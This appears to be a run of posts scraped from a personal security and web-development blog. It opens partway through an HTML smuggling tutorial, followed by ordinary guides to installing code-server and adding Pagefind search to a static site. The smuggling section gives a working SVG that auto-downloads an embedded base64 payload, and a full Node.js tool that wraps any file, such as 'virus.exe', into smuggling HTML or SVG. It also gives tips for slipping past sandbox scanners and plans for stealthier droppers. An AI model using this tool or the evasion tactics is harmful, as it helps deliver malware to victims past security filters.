    This is HTML smuggling at its most basic. Just take any file, encode it in base64, and insert the result into var file = "BASE64_ENCODED_PAYLOAD";. Easy peasy, right? But beware, savvy sandbox-based systems can sniff out these tricks. To outsmart them, try a little sleight of hand. Instead of attaching the encoded HTML directly to an email, start with a harmless-looking link. Then, after a delay, slip in the “payloaded” HTML. It’s like sneaking past security with a disguise. This delay buys you time for a thorough scan, presenting a clean, innocent page to initial scanners.

    By playing it smart, you up your chances of slipping past detection and hitting your target undetected. But hey, keep in mind, not every tactic works every time. Staying sharp and keeping up with security measures is key to staying one step ahead of potential threats.

    Advanced Smuggling

    If you’re an analyst reading this, you’re probably yawning at the simplicity of my example. I mean, come on, spotting that massive base64 string in the HTML is child’s play for you, right? But fear not, there are some nifty tweaks to spice up this technique. For instance, ever thought of injecting your code into an SVG?

    <svg
      xmlns="http://www.w3.org/2000/svg"
      xmlns:xlink="http://www.w3.org/1999/xlink"
      version="1.0"
      width="100"
      height="100"
    >
      <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
      <script>
        <![CDATA[document.addEventListener("DOMContentLoaded",function(){function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='BASE64_PAYLOAD_HERE';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='karl.webp';var a=document.createElementNS('http://www.w3.org/1999/xhtml','a');document.documentElement.appendChild(a);a.setAttribute('style','display:none');var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);});]]>
      </script>
    </svg>

    You can stash the SVG in a CDN and have it loaded at the beginning of your page. It’s a tad more sophisticated, right? Just a tad.

    Now, I can’t take credit for this genius idea. Nope, the props go to Surajpkhetani, whose tool also gave me the idea for this post. I decided to put my own spin on it and rewrote his AutoSmuggle tool in JavaScript. Why? Well, just because I can. I mean, I could have gone with Python or Go… and who knows, maybe I will someday. But for now, here’s the JavaScript code:

    const fs = require("fs");
    
    function base64Encode(plainText) {
      return Buffer.from(plainText).toString("base64");
    }
    
    function svgSmuggle(b64String, filename) {
      const obfuscatedB64 = b64String;
      const svgBody = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" width="100" height="100"><circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/><script><![CDATA[document.addEventListener("DOMContentLoaded",function(){function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='${obfuscatedB64}';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='${filename}';var a=document.createElementNS('http://www.w3.org/1999/xhtml','a');document.documentElement.appendChild(a);a.setAttribute('style','display:none');var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);});]]></script></svg>`;
      const [file2, file3] = filename.split(".");
      fs.writeFileSync(`smuggle-${file2}.svg`, svgBody);
    }
    
    function htmlSmuggle(b64String, filename) {
      const obfuscatedB64 = b64String;
      const htmlBody = `<html><body><script>function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='${obfuscatedB64}';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='${filename}';if(window.navigator.msSaveOrOpenBlob){window.navigator.msSaveOrOpenBlob(blob,fileName);}else{var a=document.createElement('a');console.log(a);document.body.appendChild(a);a.style='display:none';var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);}</script></body></html>`;
      const [file2, file3] = filename.split(".");
      fs.writeFileSync(`smuggle-${file2}.html`, htmlBody);
    }
    
    function printError(error) {
      console.error("\x1b[31m%s\x1b[0m", error);
    }
    
    function main(args) {
      try {
        let inputFile, outputType;
        for (let i = 0; i < args.length; i++) {
          if (args[i] === "-i" && args[i + 1]) {
            inputFile = args[i + 1];
            i++;
          } else if (args[i] === "-o" && args[i + 1]) {
            outputType = args[i + 1];
            i++;
          }
        }
    
        if (!inputFile || !outputType) {
          printError(
            "[-] Invalid arguments. Usage: node script.js -i inputFilePath -o outputType(svg/html)"
          );
          return;
        }
    
        console.log("[+] Reading Data");
        const streamData = fs.readFileSync(inputFile);
        const b64Data = base64Encode(streamData);
        console.log("[+] Converting to Base64");
    
        console.log("[*] Smuggling in", outputType.toUpperCase());
        if (outputType === "html") {
          htmlSmuggle(b64Data, inputFile);
          console.log("[+] File Written to Current Directory...");
        } else if (outputType === "svg") {
          svgSmuggle(b64Data, inputFile);
          console.log("[+] File Written to Current Directory...");
        } else {
          printError(
            "[-] Invalid output type. Only 'svg' and 'html' are supported."
          );
        }
      } catch (ex) {
        printError(ex.message);
      }
    }
    
    main(process.argv.slice(2));

    Essentially, it generates HTML pages or SVG “images” simply by running:

    node autosmuggler.cjs -i virus.exe -o html

    I’ve dubbed it HTMLSmuggler. Swing by my GitHub to grab the code and take a peek. But hold onto your hats, because I’ve got big plans for this little tool.

    In the pipeline, I’m thinking of ramping up the stealth factor. Picture this: slicing and dicing large files into bite-sized chunks like JSON, then sneakily loading them in once the page is up and running. Oh, and let’s not forget about auto-deleting payloads and throwing in some IndexedDB wizardry to really throw off those nosy analysts.

    I’ve got this wild notion of scattering the payload far and wide—some bits in HTML, others in JS, a few stashed away in local storage, maybe even tossing a few crumbs into a remote CDN or even the URL itself.

    The goal? To make this baby as slippery as an eel and as light as a feather. Because let’s face it, if you’re deploying a dropper, you want it to fly under the radar—not lumber around like a clumsy elephant.

    The End

    Whether you’re a newbie to HTML smuggling or a seasoned pro, I hope this journey has shed some light on this sneaky technique and sparked a few ideas along the way.

    Thanks for tagging along on this adventure through my musings and creations. Until next time, keep those creative juices flowing and stay curious! 🫡

  • Unlock the Power of Remote Development with code-server

    Unlock the Power of Remote Development with code-server

    In the fast-paced world of software development, flexibility and efficiency are paramount. Enter code-server, an innovative tool that allows you to run Visual Studio Code (VS Code) in your browser, bringing a seamless and consistent development environment to any device, anywhere.

    Whether you’re working on a powerful desktop, a modest laptop, or even a tablet (pls don’t!), code-server ensures you have access to your development environment at all times. Here’s an in-depth look at what makes code-server a game-changer.

    What is code-server?

    code-server is an open-source project that enables you to run VS Code on a remote server and access it via your web browser. This means you can:

    • Work on any device with an internet connection.

    • Leverage the power of cloud servers to handle resource-intensive tasks.

    • Maintain a consistent development environment across devices.

    With over 69.2k stars on GitHub, code-server has gained significant traction among developers, teams, and organizations looking for efficient remote development solutions.

    Why would you use code-server?

    1. Flexibility Across Devices

    Imagine coding on your laptop, switching to a tablet, or even a Chromebook, without missing a beat. With code-server, your development environment follows you wherever you go—seamlessly.

    2. Offloading Performance to the Server

    Running resource-intensive tasks on a server instead of your local machine? Yes, please! Whether you’re working on complex builds or handling large datasets, code-server takes the heavy lifting off your device and onto the server.

    3. Bringing Your Dev Environment Closer to LLMs

    With the rise of large language models (LLMs), working near powerful servers hosting these models has become a necessity. No more downloading terabytes of data just to test integrations locally. Code-server simplifies this by placing your environment right where the action is.

    4. Because I Can! 🥳

    As a coder and IT enthusiast, sometimes the best reason is simply: Because I can! Sure, you could run local VSCode with “Remote Development” extensions or install it directly on a Chromebook—but where’s the fun in that? 😉

    5. Streamlined Backup and File Management

    One of my favorite aspects? Developing directly on a remote system where my regular backup processes already take care of everything. No extra steps, no worries—just peace of mind knowing my work is secure.

    I just did it to do it; I use code-server to manage all my Proxmox scripts and develop little sysadmin tools. You also get a nice web shell.

    Installation

    Requirements

    Before diving in, make sure your system meets the minimum requirements:

    • A Linux machine with WebSockets enabled (important to know when you use a reverse proxy; see the Nginx sketch in the Configuration section below).

    • At least 1 GB RAM and 2 vCPUs.

    I think you can get away with one vCPU; mine is bored most of the time. Obviously, running resource-intensive code will eat more.

    Check out the full requirements here.

    Installation

    There are multiple ways to get started with code-server, but I chose the easiest one:

    Bash
    curl -fsSL https://code-server.dev/install.sh | sh

    This script ensures code-server is installed correctly and even provides instructions for starting it. Never run a script like this from the internet without checking it first.

    Configuration

    After installation, you can customize code-server for your needs. Explore the setup and configuration guide to tweak settings, enable authentication, and enhance your workflow.

    Bash
    nano ~/.config/code-server/config.yaml

    That is where you will find the password to access code-server, and you can also change the port:

    ~/.config/code-server/config.yaml
    bind-addr: 127.0.0.1:8080
    password: 5f89a538c9c849b439d0f866
    cert: false

    You can disable auth by commenting out the password line. Personally, I use SSO through Authentik for authentication.
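
    Since the requirements call out WebSockets, here is a minimal Nginx reverse proxy sketch (assuming code-server listening on 127.0.0.1:8080 and a hypothetical subdomain); the Upgrade and Connection headers are what keep WebSockets working:

    Nginx
    server {
        listen 443 ssl;
        server_name code.yourdomain.com;  # hypothetical subdomain
        # ssl_certificate / ssl_certificate_key omitted in this sketch

        location / {
            proxy_pass http://127.0.0.1:8080/;
            proxy_set_header Host $host;
            # these two headers enable the WebSocket upgrade
            proxy_set_header Upgrade $http_upgrade;
            proxy_set_header Connection upgrade;
        }
    }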

    Now you have an awesome way to code in your browser:

    Resources

    GitHub Repository

    Setup Guide

    Frequently Asked Questions

  • Building a static site search with Pagefind

    Building a static site search with Pagefind

    Introduction

    Hey there, web wizards and code conjurers! Today, I’m here to spill the beans on a magical tool that’ll have you searching through your static site like a pro without sacrificing your users’ data to the digital overlords. Say goodbye to the snooping eyes of Algolia and Google, and say hello to Pagefind – the hero we need in the wild world of web development!

    Pagefind

    So, what’s the deal with Pagefind? Well, it’s like having your own personal search genie, but without the need for complex setups or sacrificing your site’s performance. Here’s a quick rundown of its enchanting features straight from the Pagefind spellbook:

    • Multilingual Magic: Zero-config support for sites that speak many tongues.
    • Filtering Sorcery: A powerful filtering engine for organizing your knowledge bases.
    • Custom Sorting Spells: Tailor your search results with custom sort attributes.
    • Metadata Mysticism: Keep track of custom metadata for your pages.
    • Weighted Wand Wielding: Adjust the importance of content in your search results.
    • Section Spellcasting: Fetch results from specific sections of your pages.
    • Domain Diving: Search across multiple domains with ease.
    • Index Anything Incantation: From PDFs to JSON files, if it’s digital, Pagefind can find it!
    • Low-Bandwidth Brilliance: All this magic with minimal bandwidth consumption – now that’s some serious wizardry!

    Summoning Pagefind

    Now, let’s talk about summoning this mystical tool onto your Astro-powered site. It’s as easy as waving your wand and chanting npx pagefind --site "dist". Poof! Your site’s now equipped with the power of search!

    With a flick of your build script wand, you’ll integrate Pagefind seamlessly into your deployment pipeline. Just like adding a secret ingredient to a potion, modify your package.json build script to include Pagefind’s magic words.

    JSON
      "scripts": {
        "dev": "astro dev",
        "start": "astro dev",
        "build": "astro build && pagefind --site dist && rm dist/pagefind/*.css && cp -r dist/pagefind public/",
        "preview": "astro preview",
        "astro": "astro"
      },
    

    If you are not using Astro.js, you will have to replace dist with your build directory. I will also explain why I am making the CSS disappear.

    Running the command should automagically build your index like so:

    Bash
    [Building search indexes]
    Total:
      Indexed 1 language
      Indexed 19 pages
      Indexed 1328 words
      Indexed 0 filters
      Indexed 0 sorts
    
    Finished in 0.043 seconds
    

    Now, my site is not that big yet, but 0.043 seconds is still very fast, and if you are paying for build time, it costs next to nothing. Pagefind, being written in Rust, is very efficient.

    Getting Cozy with Pagefind’s UI

    Alright, so now you’ve got this powerful search engine at your fingertips. But wait, what’s this? Pagefind’s UI is a bit… opinionated. Fear not, fellow sorcerers! With a dash of JavaScript and a sprinkle of CSS, we’ll make it dance to our tune!

    Weaving a custom UI spell involves a bit of JavaScript incantation to tweak placeholders and buttons just the way we like them. Plus, with a bit of CSS wizardry, we can transform Pagefind’s UI into something straight out of our own enchanting design dreams!

    Astro
    ---
    import "../style/pagefind.css";
    ---

    <div class="max-w-96 flex">
      <div id="search"></div>
    </div>
    <script src="/pagefind/pagefind-ui.js" is:inline></script>
    <script>
      document.addEventListener("astro:page-load", () => {
        new PagefindUI({
          element: "#search",
          debounceTimeoutMs: 500,
          resetStyles: true,
          showEmptyFilters: false,
          excerptLength: 15,
          showImages: false,
          addStyles: false,
        });
        const searchInput = document.querySelector<HTMLInputElement>(
          ".pagefind-ui__search-input"
        );
        const clearButton = document.querySelector<HTMLDivElement>(
          ".pagefind-ui__search-clear"
        );
        if (searchInput) {
          searchInput.placeholder = "Site Search";
        }
        if (clearButton) {
          clearButton.innerText = "Clear";
        }
      });
    </script>
    • /pagefind/pagefind-ui.js is Pagefind-specific JavaScript. In the future I plan to reverse it, as there is a lot of unnecessary code in there.
    • I am using astro:page-load as an event listener since I am using view transitions.

    Embrace Your Inner Stylist

    Ah, but crafting a unique style for your search UI is where the real fun begins! With the power of TailwindCSS (or your trusty CSS wand), you can mold Pagefind’s UI to fit your site’s aesthetic like a bespoke wizard robe.

    With a little imagination and a lot of creativity, you’ll end up with a search UI that’s as unique as your magical incantations.

    CSS
    .pagefind-ui__results-area {
      @apply border border-pink-500 dark:text-white text-black p-4;
      @apply absolute z-50 dark:bg-gray-900 bg-white;
      @apply max-h-96 overflow-y-auto mr-10;
    }
    .pagefind-ui__result {
      @apply border-t my-4 dark:text-white text-black;
    }
    .pagefind-ui__result mark {
      @apply bg-fuchsia-700 text-fuchsia-300;
    }
    .pagefind-ui__form {
      @apply border dark:border-white border-black;
    }
    .pagefind-ui__search-input {
      @apply dark:text-white text-black bg-transparent;
    }
    .pagefind-ui__search-input {
      @apply placeholder:italic placeholder:text-slate-400 p-2 border-r border-black;
    }
    .pagefind-ui__form {
      @apply min-w-full;
    }
    .pagefind-ui__message {
      @apply font-semibold first-letter:text-pink-500;
    }
    .pagefind-ui__result-link {
      @apply font-bold underline text-blue-500;
    }
    .pagefind-ui__result-title {
      @apply mb-1;
    }
    .pagefind-ui__result-inner {
      @apply my-3;
    }
    .pagefind-ui__button {
      @apply border border-black py-1 px-2 hover:underline mt-4;
    }
    .pagefind-ui__search-clear {
      @apply mr-2;
    }

    (@apply is TailwindCSS specific; you can use regular CSS if you please)

    And there you have it, folks – the mystical journey of integrating Pagefind into your static site, complete with a touch of your own wizardly flair!

    custom search ui

    Now go forth, weave your web spells, and may your users’ search journeys be as magical as your coding adventures! 🧙✨

    Where to go from here

    I gave you a quick look into building a simple static site search. In my opinion, the JavaScript files from Pagefind should be slimmed down to work (in my case, for Astro), the CSS should be applied by you, and Pagefind should just leave you a simple unstyled search. I am sure they would be happy if someone helped them out by doing this.

    I was thinking about hosting my index on a Cloudflare Worker, then styling my search form however I want and just hooking up the Worker endpoint with the form, basically like a self-hosted Algolia. An alternative to Pagefind could be Fuse.js; the drawback is that you would have to build your own index.

    Bonus:

    You can try out my search here: Exploit.to Search

    This post was originally published on 17 Mar 2024 on my cybersecurity blog.